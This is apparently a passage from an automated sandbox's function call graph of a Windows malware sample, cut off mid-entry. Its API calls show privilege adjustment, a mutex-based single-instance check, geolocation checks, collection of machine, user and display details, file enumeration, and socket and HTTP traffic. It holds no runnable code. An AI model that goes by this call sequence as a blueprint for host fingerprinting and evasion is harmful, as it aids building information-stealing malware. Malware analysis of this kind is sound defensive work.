78495 218bfbed631 78494->78495 78496 218bfbed618 78494->78496 78498 218bfbeda0b 78495->78498 78503 218bfbed67c 78495->78503 78607 218bfbe40ac 7 API calls _get_daylight 78496->78607 78628 218bfbe40ac 7 API calls _get_daylight 78498->78628 78500 218bfbed61d 78608 218bfbe40cc 7 API calls _get_daylight 78500->78608 78501 218bfbeda10 78629 218bfbe40cc 7 API calls _get_daylight 78501->78629 78505 218bfbed685 78503->78505 78506 218bfbed626 78503->78506 78511 218bfbed6b6 78503->78511 78609 218bfbe40ac 7 API calls _get_daylight 78505->78609 78506->78466 78507 218bfbed691 78630 218bfbdfbec 37 API calls _invalid_parameter_noinfo 78507->78630 78509 218bfbed68a 78610 218bfbe40cc 7 API calls _get_daylight 78509->78610 78513 218bfbed6dd 78511->78513 78514 218bfbed717 78511->78514 78515 218bfbed6ea 78511->78515 78513->78515 78520 218bfbed706 78513->78520 78614 218bfbededc 78514->78614 78611 218bfbe40ac 7 API calls _get_daylight 78515->78611 78519 218bfbed6ef 78612 218bfbe40cc 7 API calls _get_daylight 78519->78612 78599 218bfbf7c7c 78520->78599 78521 218bfbeb550 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 78524 218bfbed732 78521->78524 78527 218bfbeb550 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 78524->78527 78526 218bfbed6f6 78613 218bfbdfbec 37 API calls _invalid_parameter_noinfo 78526->78613 78530 218bfbed739 78527->78530 78528 218bfbed859 78531 218bfbed8b7 ReadFile 78528->78531 78538 218bfbed863 _fread_nolock 78528->78538 78533 218bfbed741 78530->78533 78534 218bfbed75c 78530->78534 78535 218bfbed9d1 __std_fs_directory_iterator_open 78531->78535 78536 218bfbed8dd 78531->78536 78532 218bfbed845 GetConsoleMode 78532->78528 78620 218bfbe40cc 7 API calls _get_daylight 78533->78620 78622 218bfbedcb0 37 API calls 2 library calls 78534->78622 78543 218bfbed9dc 78535->78543 78548 218bfbed887 __std_fs_directory_iterator_open 78535->78548 78536->78535 78537 218bfbed8a6 78536->78537 78545 218bfbed916 78537->78545 78546 218bfbed93b 78537->78546 78556 218bfbed701 78537->78556 78538->78537 78538->78548 78541 218bfbeb550 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 78541->78506 78542 218bfbed746 78621 218bfbe40ac 7 API calls _get_daylight 78542->78621 78626 218bfbe40cc 7 API calls _get_daylight 78543->78626 78624 218bfbed208 38 API calls 4 library calls 78545->78624 78550 218bfbed9bf 78546->78550 78546->78556 78548->78556 78623 218bfbe4040 7 API calls 2 library calls 78548->78623 78625 218bfbed048 38 API calls _fread_nolock 78550->78625 78552 218bfbed9e1 78627 218bfbe40ac 7 API calls _get_daylight 78552->78627 78555 218bfbed9cc 78555->78556 78556->78541 78557->78456 78559 218bfbebbb8 _Getcoll 7 API calls 78558->78559 78560 218bfbed000 78559->78560 78561 218bfbeb550 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 78560->78561 78562 218bfbed00b 78561->78562 78562->78476 78564 218bfbed4fa 78563->78564 78568 218bfbed52a 78563->78568 78590 218bfbe40ac 7 API calls _get_daylight 78564->78590 78566 218bfbed4ff 78591 218bfbe40cc 7 API calls _get_daylight 78566->78591 78567 218bfbed543 78592 218bfbe40ac 7 API calls _get_daylight 78567->78592 78568->78567 78571 218bfbed581 78568->78571 78573 218bfbed59f 78571->78573 78574 218bfbed58a 78571->78574 78572 218bfbed548 78593 218bfbe40cc 7 API calls _get_daylight 78572->78593 78578 218bfbed5d1 78573->78578 78579 218bfbed5bc 78573->78579 78595 218bfbe40ac 7 API calls _get_daylight 78574->78595 78577 218bfbed58f 78596 218bfbe40cc 7 API calls _get_daylight 78577->78596 78583 218bfbed5f0 _fread_nolock 41 API calls 78578->78583 78597 218bfbe40cc 7 API calls _get_daylight 78579->78597 78587 218bfbed507 78583->78587 78584 218bfbed550 78594 218bfbdfbec 37 API calls _invalid_parameter_noinfo 78584->78594 78585 218bfbed5c1 78598 218bfbe40ac 7 API calls _get_daylight 78585->78598 78587->78481 78588->78473 78589->78484 78590->78566 78591->78587 78592->78572 78593->78584 78594->78587 78595->78577 78596->78584 78597->78585 78598->78587 78600 218bfbf7c85 78599->78600 78601 218bfbf7c92 78599->78601 78631 218bfbe40cc 7 API calls _get_daylight 78600->78631 78603 218bfbed826 78601->78603 78632 218bfbe40cc 7 API calls _get_daylight 78601->78632 78603->78528 78603->78532 78605 218bfbf7cc9 78633 218bfbdfbec 37 API calls _invalid_parameter_noinfo 78605->78633 78607->78500 78608->78506 78609->78509 78610->78507 78611->78519 78612->78526 78613->78556 78615 218bfbedf27 78614->78615 78618 218bfbedeeb wcsftime 78614->78618 78634 218bfbe40cc 7 API calls _get_daylight 78615->78634 78617 218bfbed728 78617->78521 78618->78615 78618->78617 78619 218bfbf7f30 std::_Facet_Register LeaveCriticalSection 78618->78619 78619->78618 78620->78542 78621->78556 78622->78520 78623->78556 78624->78556 78625->78555 78626->78552 78627->78556 78628->78501 78629->78507 78630->78506 78631->78603 78632->78605 78633->78603 78634->78617 78635 218bfbb1340 78636 218bfb7e9a0 44 API calls 78635->78636 78637 218bfbb139f 78636->78637 78638 218bfb7e9a0 44 API calls 78637->78638 78639 218bfbb1c14 78638->78639 78641 218bfb7d390 38 API calls 78639->78641 78650 218bfbb2036 _Receive_impl 78639->78650 78640 218bfbfcb70 _Strcoll 3 API calls 78642 218bfbb2061 78640->78642 78643 218bfbb1c4a 78641->78643 78644 218bfb7d220 39 API calls 78643->78644 78645 218bfbb1c58 78644->78645 78690 218bfbb4150 78645->78690 78648 218bfbc9830 100 API calls 78649 218bfbb1d1d 78648->78649 78649->78650 78651 218bfbb207d 78649->78651 78650->78640 78652 218bfb94670 38 API calls 78651->78652 78653 218bfbb20a5 78652->78653 78654 218bfb94740 38 API calls 78653->78654 78655 218bfbb20ba Concurrency::cancel_current_task 78654->78655 78656 218bfb7e080 39 API calls 78655->78656 78657 218bfbb20dd 78656->78657 78658 218bfb7e080 39 API calls 78657->78658 78659 218bfbb20ef 78658->78659 78660 218bfb7e080 39 API calls 78659->78660 78661 218bfbb20ff 78660->78661 78662 218bfb7e080 39 API calls 78661->78662 78663 218bfbb2127 78662->78663 78664 218bfb7e080 39 API calls 78663->78664 78665 218bfbb214f 78664->78665 78666 218bfb7d390 38 API calls 78665->78666 78667 218bfbb21b7 78666->78667 78668 218bfb7d220 39 API calls 78667->78668 78669 218bfbb21c8 78668->78669 78670 218bfb7d6c0 38 API calls 78669->78670 78671 218bfbb26c6 78670->78671 78672 218bfb7d6c0 38 API calls 78671->78672 78673 218bfbb290d 78672->78673 78674 218bfbc8f60 100 API calls 78673->78674 78675 218bfbb291e 78674->78675 78694 218bfb90120 57 API calls 4 library calls 78675->78694 78677 218bfbb2c3e 78695 218bfb943d0 38 API calls 3 library calls 78677->78695 78679 218bfbb2c7e 78687 218bfbb3623 78679->78687 78696 218bfb7e900 46 API calls _Strcoll 78679->78696 78681 218bfbb2c9a 78682 218bfbb3737 78681->78682 78681->78687 78697 218bfb7e0f0 39 API calls Concurrency::cancel_current_task 78682->78697 78688 218bfbfcb70 _Strcoll 3 API calls 78687->78688 78689 218bfbb3708 78688->78689 78691 218bfbb4176 78690->78691 78698 218bfbb5760 78691->78698 78693 218bfbb1c6b 78693->78648 78694->78677 78695->78679 78696->78681 78699 218bfbb5825 78698->78699 78702 218bfbb5790 ctype 78698->78702 78703 218bfbb9b20 39 API calls 4 library calls 78699->78703 78701 218bfbb583a 78701->78693 78702->78693 78703->78701 78704 218bfbc6480 78769 218bfbc9760 GetCurrentProcess OpenProcessToken 78704->78769 78707 218bfbc64a4 79012 218bfbc9aa0 39 API calls 2 library calls 78707->79012 78708 218bfbc64ce 78774 218bfbd5970 GetCurrentProcess OpenProcessToken 78708->78774 78712 218bfbc64ae 79013 218bfbd4740 66 API calls _Strcoll 78712->79013 78714 218bfbd5970 8 API calls 78716 218bfbc64e6 78714->78716 78715 218bfbc64b7 78718 218bfbc64c2 ExitProcess 78715->78718 78782 218bfbd1ff0 78716->78782 78718->78708 78719 218bfbc64f0 78956 218bfbc6eb0 78719->78956 78721 218bfbc6576 _Receive_impl 78722 218bfbc65b4 OpenMutexA 78721->78722 78727 218bfbc6746 78721->78727 78723 218bfbc65ed ExitProcess 78722->78723 78724 218bfbc65f9 CreateMutexA 78722->78724 78723->78724 78725 218bfbc6629 78724->78725 78960 218bfbc9be0 78725->78960 78729 218bfbc6632 ExitProcess 78730 218bfbc663e 78729->78730 78988 218bfb8b820 LoadLibraryA 78730->78988 78733 218bfb8c8c0 60 API calls 78734 218bfbc6656 78733->78734 78735 218bfb8cf60 60 API calls 78734->78735 78736 218bfbc665b 78735->78736 78737 218bfb8dc90 61 API calls 78736->78737 78738 218bfbc6660 78737->78738 78739 218bfb8acc0 40 API calls 78738->78739 78740 218bfbc6665 78739->78740 78741 218bfbb0d70 46 API calls 78740->78741 78742 218bfbc666a 78741->78742 78743 218bfbb3a60 46 API calls 78742->78743 78744 218bfbc666f 78743->78744 78745 218bfb81100 105 API calls 78744->78745 78746 218bfbc6674 78745->78746 78747 218bfb89090 107 API calls 78746->78747 78748 218bfbc667a 78747->78748 78749 218bfbc70e0 68 API calls 78748->78749 78750 218bfbc668c 78749->78750 78751 218bfb8a1f0 105 API calls 78750->78751 78752 218bfbc6691 78751->78752 78753 218bfb85a90 3 API calls 78752->78753 78754 218bfbc6696 78753->78754 78755 218bfb85d60 41 API calls 78754->78755 78756 218bfbc66a0 78755->78756 78757 218bfbce9f0 46 API calls 78756->78757 78758 218bfbc66a6 78757->78758 79014 218bfbc5a80 86 API calls 2 library calls 78758->79014 78760 218bfbc66b3 78761 218bfbc66b8 ReleaseMutex 78760->78761 78762 218bfbc66ca ProcessCodePage 78760->78762 78761->78762 78763 218bfbc66d3 78762->78763 78764 218bfbc66d9 _Receive_impl 78762->78764 79015 218bfbc6760 40 API calls 4 library calls 78763->79015 78764->78727 78767 218bfbfcb70 _Strcoll 3 API calls 78764->78767 78766 218bfbc66d8 78766->78764 78768 218bfbc673d 78767->78768 78770 218bfbc97f4 78769->78770 78771 218bfbc97b8 GetTokenInformation 78769->78771 78772 218bfbfcb70 _Strcoll 3 API calls 78770->78772 78771->78770 78773 218bfbc64a0 78772->78773 78773->78707 78773->78708 78775 218bfbd5a46 78774->78775 78776 218bfbd59db LookupPrivilegeValueW 78774->78776 78778 218bfbd5a4e CloseHandle 78775->78778 78779 218bfbd5a5a 78775->78779 78776->78775 78777 218bfbd59fc AdjustTokenPrivileges 78776->78777 78777->78775 78778->78779 78780 218bfbfcb70 _Strcoll 3 API calls 78779->78780 78781 218bfbc64da 78780->78781 78781->78714 79016 218bfbd0c30 GetCurrentHwProfileW 78782->79016 78786 218bfbd20f9 78787 218bfbd2143 78786->78787 79347 218bfbdde34 40 API calls 78786->79347 79038 218bfbd7550 78787->79038 78790 218bfbd2153 78791 218bfbe6cc0 37 API calls 78790->78791 78793 218bfbd219c 78790->78793 78795 218bfbd21cc ctype _Receive_impl 78790->78795 78791->78790 78792 218bfbd229a _Receive_impl 78794 218bfbfcb70 _Strcoll 3 API calls 78792->78794 78793->78795 78796 218bfbe6cc0 37 API calls 78793->78796 78797 218bfbd22bf 78794->78797 78795->78792 78798 218bfbd22dc 78795->78798 78796->78793 78797->78719 79050 218bfbd0500 78798->79050 78809 218bfbd1ff0 138 API calls 78810 218bfbd237d 78809->78810 79102 218bfbcff80 78810->79102 78812 218bfbd2387 78813 218bfba24f0 38 API calls 78812->78813 78814 218bfbd23b1 78813->78814 78815 218bfb8eda0 38 API calls 78814->78815 78816 218bfbd240b 78815->78816 78817 218bfb8eda0 38 API calls 78816->78817 78818 218bfbd244e 78817->78818 78819 218bfb90fb0 38 API calls 78818->78819 78820 218bfbd247e 78819->78820 78821 218bfba24f0 38 API calls 78820->78821 78822 218bfbd24a7 78821->78822 78823 218bfb8eda0 38 API calls 78822->78823 78824 218bfbd24f6 78823->78824 78825 218bfb8eda0 38 API calls 78824->78825 78826 218bfbd2545 78825->78826 78957 218bfbc6ed2 78956->78957 78957->78957 78958 218bfbb5760 39 API calls 78957->78958 78959 218bfbc6ee6 78958->78959 78959->78721 79553 218bfbcf890 GetUserGeoID GetGeoInfoA 78960->79553 78962 218bfba24f0 38 API calls 78964 218bfbc9c9f 78962->78964 78963 218bfbc9c25 _Strcoll 78963->78962 78987 218bfbc9e28 _Receive_impl 78963->78987 78965 218bfb8eda0 38 API calls 78964->78965 78966 218bfbc9ce6 78965->78966 78967 218bfb8eda0 38 API calls 78966->78967 78969 218bfbc9d23 78967->78969 78968 218bfbfcb70 _Strcoll 3 API calls 78970 218bfbc662e 78968->78970 78971 218bfb90fb0 38 API calls 78969->78971 78970->78729 78970->78730 78972 218bfbc9d4d WSAStartup 78971->78972 78973 218bfbc9d67 socket 78972->78973 78972->78987 78975 218bfbc9d91 htons 78973->78975 78976 218bfbc9e22 WSACleanup 78973->78976 78974 218bfbc9fc9 78977 218bfbc9ecc 78975->78977 78980 218bfbc9dc4 78975->78980 78976->78987 78978 218bfbc8e10 40 API calls 78977->78978 78984 218bfbc9edd _Receive_impl 78978->78984 78981 218bfbc9dd9 inet_pton connect 78980->78981 78983 218bfbc9e15 closesocket 78980->78983 79559 218bfbd7890 78980->79559 78981->78980 78982 218bfbc9eaa 78981->78982 78982->78977 78986 218bfb915c0 38 API calls 78982->78986 78983->78976 78984->78974 78985 218bfbc8e10 40 API calls 78984->78985 78985->78987 78986->78977 78987->78968 78987->78974 78989 218bfb8c7d9 78988->78989 78990 218bfb8b925 6 API calls 78988->78990 78991 218bfb8c807 78989->78991 78992 218bfb8c7fe FreeLibrary 78989->78992 78990->78989 79004 218bfb8bce6 _Receive_impl 78990->79004 78993 218bfbfcb70 _Strcoll 3 API calls 78991->78993 78992->78991 78994 218bfb8c816 78993->78994 78994->78733 78995 218bfbc1bf0 38 API calls 78995->79004 78997 218bfb925a0 38 API calls 78997->79004 78998 218bfb922d0 38 API calls 78998->79004 78999 218bfb8eda0 38 API calls 78999->79004 79000 218bfb90fb0 38 API calls 79000->79004 79001 218bfb93990 38 API calls 79001->79004 79002 218bfbfcb98 38 API calls std::_Facet_Register 79002->79004 79004->78989 79004->78995 79004->78997 79004->78998 79004->78999 79004->79000 79004->79001 79004->79002 79005 218bfb90840 38 API calls 79004->79005 79006 218bfb8c837 79004->79006 79009 218bfb8c877 Concurrency::cancel_current_task 79004->79009 79565 218bfba9100 38 API calls std::_Facet_Register 79004->79565 79566 218bfb99d50 38 API calls 2 library calls 79004->79566 79567 218bfb8e3a0 38 API calls _Receive_impl 79004->79567 79005->79004 79007 218bfb94670 38 API calls 79006->79007 79010 218bfb8c862 79007->79010 79011 218bfb94740 38 API calls 79010->79011 79011->79009 79012->78712 79013->78715 79014->78760 79015->78766 79017 218bfbd0c7a 79016->79017 79019 218bfbd0cd9 79016->79019 79018 218bfbc1bf0 38 API calls 79017->79018 79021 218bfbd0c89 79018->79021 79020 218bfbfcb70 _Strcoll 3 API calls 79019->79020 79022 218bfbd0d51 79020->79022 79021->79019 79348 218bfbdde34 40 API calls 79021->79348 79024 218bfbd0250 79022->79024 79349 218bfbc9920 79024->79349 79028 218bfbd02f3 memcpy_s _Receive_impl 79029 218bfbd0417 79028->79029 79037 218bfbd0341 79028->79037 79360 218bfbc2490 57 API calls 79028->79360 79030 218bfbfcb70 _Strcoll 3 API calls 79032 218bfbd03fe 79030->79032 79032->78786 79033 218bfbd037d 79361 218bfbc25f0 56 API calls 2 library calls 79033->79361 79035 218bfbd03a4 79036 218bfb8e100 38 API calls 79035->79036 79036->79037 79037->79030 79039 218bfbd7698 79038->79039 79042 218bfbd7599 79038->79042 79372 218bfb7b870 38 API calls 79039->79372 79043 218bfbd75d8 79042->79043 79044 218bfbd75fa ctype 79042->79044 79046 218bfbd7636 79042->79046 79045 218bfbfcb98 std::_Facet_Register 38 API calls 79043->79045 79048 218bfbd75f1 79043->79048 79044->78790 79045->79048 79047 218bfbfcb98 std::_Facet_Register 38 API calls 79046->79047 79047->79044 79048->79044 79371 218bfb7b7b0 38 API calls 2 library calls 79048->79371 79051 218bfbd0559 memcpy_s 79050->79051 79052 218bfbfcb98 std::_Facet_Register 38 API calls 79051->79052 79053 218bfbd05c3 79052->79053 79054 218bfbd0608 EnumDisplayDevicesW 79053->79054 79060 218bfbd0625 _Receive_impl 79054->79060 79063 218bfbd06c9 79054->79063 79055 218bfbc1bf0 38 API calls 79055->79060 79056 218bfbd06d1 79058 218bfbfcb70 _Strcoll 3 API calls 79056->79058 79062 218bfbd07ee 79058->79062 79059 218bfbd0691 EnumDisplayDevicesW 79059->79060 79059->79063 79060->79055 79060->79059 79064 218bfbd080f 79060->79064 79373 218bfbd7d70 38 API calls 2 library calls 79060->79373 79061 218bfb90dc0 38 API calls 79061->79063 79065 218bfbd0420 RegGetValueA 79062->79065 79063->79056 79063->79061 79066 218bfbd049d 79065->79066 79067 218bfbfcb70 _Strcoll 3 API calls 79066->79067 79068 218bfbd04df 79067->79068 79069 218bfbd0820 79068->79069 79070 218bfbd08af 79069->79070 79073 218bfbd08c0 _Receive_impl 79069->79073 79071 218bfb951e0 38 API calls 79070->79071 79071->79073 79072 218bfb90dc0 38 API calls 79072->79073 79073->79072 79074 218bfbd099e 79073->79074 79077 218bfbd0c0b 79073->79077 79374 218bfc0b3c4 GetNativeSystemInfo 79074->79374 79076 218bfbd09a3 79078 218bfbb5760 39 API calls 79076->79078 79079 218bfbd0a44 79078->79079 79080 218bfb90dc0 38 API calls 79079->79080 79081 218bfbd0a8e 79080->79081 79082 218bfb90dc0 38 API calls 79081->79082 79083 218bfbd0ae8 _Receive_impl 79082->79083 79083->79077 79084 218bfbfcb70 _Strcoll 3 API calls 79083->79084 79085 218bfbd0bee 79084->79085 79086 218bfbd0110 79085->79086 79375 218bfbfd830 79086->79375 79089 218bfbd015f 79091 218bfbc1bf0 38 API calls 79089->79091 79090 218bfbd016c 79092 218bfbfcb70 _Strcoll 3 API calls 79090->79092 79091->79090 79093 218bfbd019e 79092->79093 79094 218bfbd01b0 79093->79094 79095 218bfbfd830 _Strcoll 79094->79095 79096 218bfbd01c0 GetComputerNameW 79095->79096 79097 218bfbd01ff 79096->79097 79098 218bfbd020c 79096->79098 79099 218bfbc1bf0 38 API calls 79097->79099 79100 218bfbfcb70 _Strcoll 3 API calls 79098->79100 79099->79098 79101 218bfbd023e 79100->79101 79101->78809 79103 218bfbd0080 79102->79103 79377 218bfbcf200 79103->79377 79105 218bfbd00a4 _Receive_impl 79105->78812 79347->78786 79348->79021 79362 218bfbc7d40 79349->79362 79351 218bfbc9a82 79368 218bfbc7b50 38 API calls Concurrency::cancel_current_task 79351->79368 79353 218bfbc996d 79353->79351 79355 218bfb84c00 38 API calls 79353->79355 79356 218bfbc99de 79355->79356 79356->79351 79357 218bfbc9a47 _Receive_impl 79356->79357 79358 218bfbfcb70 _Strcoll 3 API calls 79357->79358 79359 218bfbc9a6c GetVolumeInformationW 79358->79359 79359->79028 79360->79033 79361->79035 79363 218bfbc7dbf 79362->79363 79365 218bfbc7da0 __std_fs_get_current_path 79362->79365 79363->79365 79369 218bfb957d0 38 API calls 4 library calls 79363->79369 79367 218bfbc7ed5 79365->79367 79370 218bfb957d0 38 API calls 4 library calls 79365->79370 79367->79353 79369->79365 79370->79365 79371->79039 79373->79060 79374->79076 79376 218bfbd0120 GetUserNameW 79375->79376 79376->79089 79376->79090 79378 218bfbcf3a0 79377->79378 79378->79378 79379 218bfbcf3b7 InternetOpenA 79378->79379 79380 218bfbcf475 InternetOpenUrlA 79379->79380 79393 218bfbcf3e2 79379->79393 79382 218bfbcf4e9 HttpQueryInfoW 79380->79382 79380->79393 79384 218bfbcf516 79382->79384 79385 218bfbcf54f HttpQueryInfoW 79382->79385 79383 218bfbfcb70 _Strcoll 3 API calls 79388 218bfbcf45a 79383->79388 79384->79385 79386 218bfbcf5ac 79385->79386 79387 218bfbcf5d8 InternetQueryDataAvailable 79385->79387 79407 218bfbe3f10 37 API calls ProcessCodePage 79386->79407 79391 218bfbcf7d3 InternetCloseHandle 79387->79391 79396 218bfbcf5f4 79387->79396 79388->79105 79390 218bfbcf86f 79408 218bfb7b7b0 38 API calls 2 library calls 79390->79408 79391->79393 79392 218bfbcf5bd 79392->79387 79397 218bfb951e0 38 API calls 79392->79397 79393->79390 79402 218bfbcf436 _Receive_impl 79393->79402 79395 218bfbcf699 InternetReadFile 79399 218bfbcf64e memcpy_s ctype _Receive_impl 79395->79399 79403 218bfbcf78d _Receive_impl 79395->79403 79396->79390 79396->79391 79396->79395 79396->79399 79404 218bfbfcb98 std::_Facet_Register 38 API calls 79396->79404 79400 218bfbcf5ce 79397->79400 79398 218bfbcf880 79399->79390 79399->79395 79399->79396 79401 218bfbfcb98 std::_Facet_Register 38 API calls 79399->79401 79399->79403 79405 218bfb95cb0 38 API calls 79399->79405 79406 218bfbcf766 InternetQueryDataAvailable 79399->79406 79400->79387 79401->79399 79402->79383 79403->79390 79403->79391 79404->79396 79405->79399 79406->79391 79406->79399 79407->79392 79408->79398 79554 218bfb8fc80 38 API calls 79553->79554 79555 218bfbcf905 GetGeoInfoA 79554->79555 79557 218bfb8fc80 38 API calls 79555->79557 79558 218bfbcf938 79557->79558 79558->78963 79561 218bfbd78ac 79559->79561 79560 218bfbe6cc0 37 API calls 79560->79561 79561->79560 79564 218bfbd78db ctype 79561->79564 79562 218bfbd795a ctype 79562->78980 79563 218bfbe6cc0 37 API calls 79563->79564 79564->79562 79564->79563 79565->79004 79566->79004 79568 218bfbc667d 79569 218bfbc6682 79568->79569 79570 218bfbc70e0 68 API calls 79569->79570 79571 218bfbc668c 79570->79571 79572 218bfb8a1f0 105 API calls 79571->79572 79573 218bfbc6691 79572->79573 79574 218bfb85a90 3 API calls 79573->79574 79575 218bfbc6696 79574->79575 79576 218bfb85d60 41 API calls 79575->79576 79577 218bfbc66a0 79576->79577 79578 218bfbce9f0 46 API calls 79577->79578 79579 218bfbc66a6 79578->79579 79591 218bfbc5a80 86 API calls 2 library calls 79579->79591 79581 218bfbc66b3 79582 218bfbc66b8 ReleaseMutex 79581->79582 79583 218bfbc66ca ProcessCodePage 79581->79583 79582->79583 79584 218bfbc66d3 79583->79584 79585 218bfbc66d9 _Receive_impl 79583->79585 79592 218bfbc6760 40 API calls 4 library calls 79584->79592 79588 218bfbfcb70 _Strcoll 3 API calls 79585->79588 79590 218bfbc674c 79585->79590 79587 218bfbc66d8 79587->79585 79589 218bfbc673d 79588->79589 79591->79581 79592->79587 79593 7ff7aa120554 79594 7ff7aa120559 RtlFreeHeap 79593->79594 79595 7ff7aa120588 79593->79595 79594->79595 79596 7ff7aa120574 GetLastError 79594->79596 79597 7ff7aa120581 __free_lconv_num 79596->79597 79599 7ff7aa120664 11 API calls __free_lconv_num 79597->79599 79599->79595 79600 218bfbe7db8 79601 218bfbe7c1c _fread_nolock 37 API calls 79600->79601 79602 218bfbe7dd7 79601->79602 79603 218bfbe7e18 79602->79603 79604 218bfbe7ddf 79602->79604 79622 218bfbe7d3c 37 API calls ProcessCodePage 79602->79622 79603->79604 79606 218bfbe7e59 79603->79606 79623 218bfbec8f0 37 API calls 2 library calls 79603->79623 79611 218bfbe7c44 79606->79611 79609 218bfbe7e4d 79609->79606 79610 218bfbecfdc _fread_nolock 7 API calls 79609->79610 79610->79606 79612 218bfbe7c1c _fread_nolock 37 API calls 79611->79612 79613 218bfbe7c69 79612->79613 79614 218bfbe7d0a 79613->79614 79615 218bfbe7c79 79613->79615 79633 218bfbeb128 37 API calls 2 library calls 79614->79633 79617 218bfbe7c97 79615->79617 79620 218bfbe7cb5 79615->79620 79632 218bfbeb128 37 API calls 2 library calls 79617->79632 79619 218bfbe7ca5 79619->79604 79620->79619 79624 218bfbedc0c 79620->79624 79622->79603 79623->79609 79625 218bfbedc3c 79624->79625 79634 218bfbeda40 79625->79634 79627 218bfbedc55 79629 218bfbedc7b 79627->79629 79641 218bfbddb64 37 API calls 2 library calls 79627->79641 79630 218bfbedc90 79629->79630 79642 218bfbddb64 37 API calls 2 library calls 79629->79642 79630->79619 79632->79619 79633->79619 79635 218bfbeda97 79634->79635 79638 218bfbeda69 79634->79638 79636 218bfbedab0 79635->79636 79639 218bfbedb07 79635->79639 79648 218bfbdfb20 37 API calls 2 library calls 79636->79648 79638->79627 79639->79638 79643 218bfbedb60 79639->79643 79641->79629 79642->79630 79649 218bfbf3b78 79643->79649 79646 218bfbedb9e SetFilePointerEx 79647 218bfbedb8d __std_fs_directory_iterator_open _fread_nolock 79646->79647 79647->79638 79648->79638 79650 218bfbf3b96 79649->79650 79651 218bfbf3b81 79649->79651 79658 218bfbedb87 79650->79658 79663 218bfbe40ac 7 API calls _get_daylight 79650->79663 79661 218bfbe40ac 7 API calls _get_daylight 79651->79661 79654 218bfbf3b86 79662 218bfbe40cc 7 API calls _get_daylight 79654->79662 79655 218bfbf3bd1 79664 218bfbe40cc 7 API calls _get_daylight 79655->79664 79658->79646 79658->79647 79659 218bfbf3bd9 79665 218bfbdfbec 37 API calls _invalid_parameter_noinfo 79659->79665 79661->79654 79662->79658 79663->79655 79664->79659 79665->79658 79666 218bfbd6bb7 79667 218bfbd6bc1 79666->79667 79672 218bfbd70b0 79667->79672 79670 218bfbfcb70 _Strcoll 3 API calls 79671 218bfbd6f13 79670->79671 79673 218bfbd70ef 79672->79673 79678 218bfbd6bd0 79672->79678 79674 218bfbd7368 79673->79674 79681 218bfbd72ed Concurrency::cancel_current_task 79673->79681 79686 218bfb90dc0 38 API calls 79673->79686 79687 218bfba9930 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry _Strcoll 79674->79687 79676 218bfbd7389 79688 218bfbd88e0 38 API calls 79676->79688 79678->79670 79679 218bfbd739f 79680 218bfb94740 38 API calls 79679->79680 79680->79681 79681->79678 79689 218bfbd89c0 38 API calls 79681->79689 79683 218bfbd73ea 79684 218bfb94740 38 API calls 79683->79684 79685 218bfbd73fd Concurrency::cancel_current_task 79684->79685 79686->79673 79687->79676 79688->79679 79689->79683 79690 218bfb858f3 79696 218bfb7d8f0 79690->79696 79692 218bfb85926 FindNextFileW 79693 218bfb85944 79692->79693 79694 218bfbfcb70 _Strcoll 3 API calls 79693->79694 79695 218bfb8596b 79694->79695 79697 218bfb7d908 _Receive_impl 79696->79697 79697->79692 79698 7ff7aa1035d0 79719 7ff7aa103e40 79698->79719 79700 7ff7aa1035fa 79701 7ff7aa10375c 79700->79701 79738 7ff7aa104f00 79700->79738 79703 7ff7aa12cbc0 std::_Xinvalid_argument 8 API calls 79701->79703 79704 7ff7aa1037a5 79703->79704 79706 7ff7aa104f00 9 API calls 79707 7ff7aa103652 79706->79707 79707->79701 79708 7ff7aa104f00 9 API calls 79707->79708 79709 7ff7aa10367c 79708->79709 79709->79701 79710 7ff7aa104f00 9 API calls 79709->79710 79713 7ff7aa1036dc 79710->79713 79711 7ff7aa103720 79744 7ff7aa103c20 79711->79744 79713->79711 79714 7ff7aa104f00 9 API calls 79713->79714 79715 7ff7aa103702 79714->79715 79715->79711 79717 7ff7aa104f00 9 API calls 79715->79717 79717->79711 79720 7ff7aa103f44 79719->79720 79721 7ff7aa103e5b 79719->79721 79720->79700 79722 7ff7aa104f00 9 API calls 79721->79722 79723 7ff7aa103e65 79722->79723 79723->79720 79724 7ff7aa104f00 9 API calls 79723->79724 79725 7ff7aa103e9b 79724->79725 79725->79720 79726 7ff7aa104f00 9 API calls 79725->79726 79730 7ff7aa103ebc 79726->79730 79727 7ff7aa103f29 79767 7ff7aa103a10 9 API calls 79727->79767 79729 7ff7aa103f31 79729->79700 79730->79727 79731 7ff7aa104f00 9 API calls 79730->79731 79732 7ff7aa103ee1 79731->79732 79732->79727 79733 7ff7aa104f00 9 API calls 79732->79733 79734 7ff7aa103eff 79733->79734 79734->79727 79735 7ff7aa103f0e 79734->79735 79766 7ff7aa103b20 9 API calls 79735->79766 79737 7ff7aa103f16 79737->79700 79742 7ff7aa104f8f 79738->79742 79743 7ff7aa104f24 79738->79743 79739 7ff7aa104f30 VirtualQuery 79739->79742 79739->79743 79740 7ff7aa12cbc0 std::_Xinvalid_argument 8 API calls 79741 7ff7aa10361a 79740->79741 79741->79701 79741->79706 79742->79740 79743->79739 79743->79742 79745 7ff7aa103c42 79744->79745 79746 7ff7aa10374f 79744->79746 79747 7ff7aa104f00 9 API calls 79745->79747 79746->79701 79756 7ff7aa103200 79746->79756 79748 7ff7aa103c4c 79747->79748 79748->79746 79749 7ff7aa104f00 9 API calls 79748->79749 79750 7ff7aa103c82 79749->79750 79750->79746 79751 7ff7aa104f00 9 API calls 79750->79751 79752 7ff7aa103ca4 79751->79752 79752->79746 79753 7ff7aa104f00 9 API calls 79752->79753 79754 7ff7aa103cc9 79753->79754 79754->79746 79755 7ff7aa104f00 9 API calls 79754->79755 79755->79746 79757 7ff7aa103224 79756->79757 79762 7ff7aa103276 79756->79762 79758 7ff7aa104f00 9 API calls 79757->79758 79760 7ff7aa10322e 79758->79760 79759 7ff7aa1035ac 79759->79701 79761 7ff7aa104f00 9 API calls 79760->79761 79760->79762 79763 7ff7aa103258 79761->79763 79762->79759 79768 7ff7aa102e10 79762->79768 79763->79762 79764 7ff7aa104f00 9 API calls 79763->79764 79764->79762 79766->79737 79767->79729 79769 7ff7aa104f00 9 API calls 79768->79769 79772 7ff7aa102e5a 79769->79772 79770 7ff7aa104f00 9 API calls 79771 7ff7aa102fcb 79770->79771 79790 7ff7aa102710 79771->79790 79773 7ff7aa102710 54 API calls 79772->79773 79776 7ff7aa102e95 ISource 79772->79776 79773->79776 79775 7ff7aa103009 79777 